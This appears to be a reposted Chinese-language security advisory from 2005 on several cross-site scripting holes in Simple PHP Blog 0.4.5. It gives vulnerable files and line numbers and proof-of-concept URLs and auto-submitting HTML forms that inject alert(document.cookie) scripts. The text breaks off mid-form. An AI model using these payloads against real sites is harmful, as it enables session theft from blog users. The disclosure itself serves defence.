Simple PHP Blog多个跨站脚本漏洞
2008-04-10 03:01:42来源:互联网 阅读 ()
发布日期:2005-11-04
更新日期:2005-11-04
受影响系统:
Simple PHP Blog Simple PHP Blog 0.4.5描述:
Simple PHP Blog Simple PHP Blog 0.4
BUGTRAQ ID: 15283
Simple PHP Blog是一个采用PHP语言编写的开放源码的免费单用户Blog程序。
Simple PHP Blog中存在多个跨站脚本漏洞,如下:
1) preview_cgi.php
preview_cgi.php的第126行没有经过充分过滤便直接向浏览器显示$entry变量。登录后可通过以下URL测试:
http://your-server/path-to-sphpblog/preview_cgi.php?entry=foo"><script>alert(document.cookie)</script>
2) preview_cgi.php
preview_cgi.php文件的第129行没有经过充分过滤便直接向浏览器显示$temp_subject变量。登录后可通过以下页面测试:
<form action="http://your-server/path-to-sphpblog/preview_cgi.php" method="post">
<input name="blog_subject" value='"><script>alert(document.cookie)</script>'/>
<input type="submit"/>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
类似的漏洞也影响preview_cgi.php第158行:
<form action="http://your-server/path-to-sphpblog/preview_cgi.php" method="post">
<input name="blog_text" value='</textarea><script>alert(document.cookie)</script>'/>
<input type="submit"/>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
3) preview_static_cgi.php
preview_static_cgi.php中存在4个类似于preview_cgi.php中的漏洞:
- 73行$entry变量:
http://localhost/~enji/path-to-sphpblog/preview_static_cgi.php?entry=foo"><script>alert(document.cookie)</script>
- 76行$temp_subject变量:
<form action="http://your-server/path-to-sphpblog/preview_static_cgi.php" method="post">
<input name="blog_subject" value='"><script>alert(document.cookie)</script>'/>
<input type="submit"/>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
- 158行$temp_text变量:
<form action="http://your-server/path-to-sphpblog/preview_static_cgi.php" method="post">
<input name="blog_text" value='</textarea><script>alert(document.cookie)</script>'/>
<input type="submit"/>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
- 108行,如果没有设置$_GET['entry']的话将$temp_file_name变量设置为$_POST['file_name'],否则设置为$entry(在这种情况下请见73行的漏洞):
<form action="http://your-server/path-to-sphpblog/preview_static_cgi.php" method="post">
<input name="file_name" value='"><script>alert(document.cookie)</script>'/>
<input type="submit"/>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
4) colors.php
colors.php文件187行的$preset_name和$result变量存在跨站脚本漏洞:
<form action="http://your-server/path-to-sphpblog/colors_cgi.php" method="post">
<input name="save_btn" value="1"/>
<input name="scheme_name" value='"></option></select><script>alert(document.cookie)</script>'/>
<input name="scheme_file" value="blabla"/>
<input type="submit"/>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
或
<form action="http://your-server/path-to-sphpblog/colors_cgi.php" method="post">
<input name="save_btn" value="1"/>
<input name="scheme_name" value="myscheme"/>
<input name="scheme_file" value="blabla"/>
<input name="bg_color" value='"><script>alert(document.cookie)</script>'/>
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash